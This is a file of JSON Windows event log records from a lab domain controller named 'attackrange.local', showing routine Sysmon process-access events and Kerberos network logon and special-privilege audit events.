{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4657,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.735\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.735","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4658,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.735\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.735","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4659,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.735\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.735","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4660,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.735\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.735","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220435,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x662B2\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x662b2","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220436,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x662B2\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t0\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x662b2","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"0","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220437,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x662FC\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x662fc","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220438,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x662FC\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t10.0.1.14\r\n\tSource Port:\t\t52639\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x662fc","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"10.0.1.14","IpPort":"52639","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4661,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.844\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.844","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
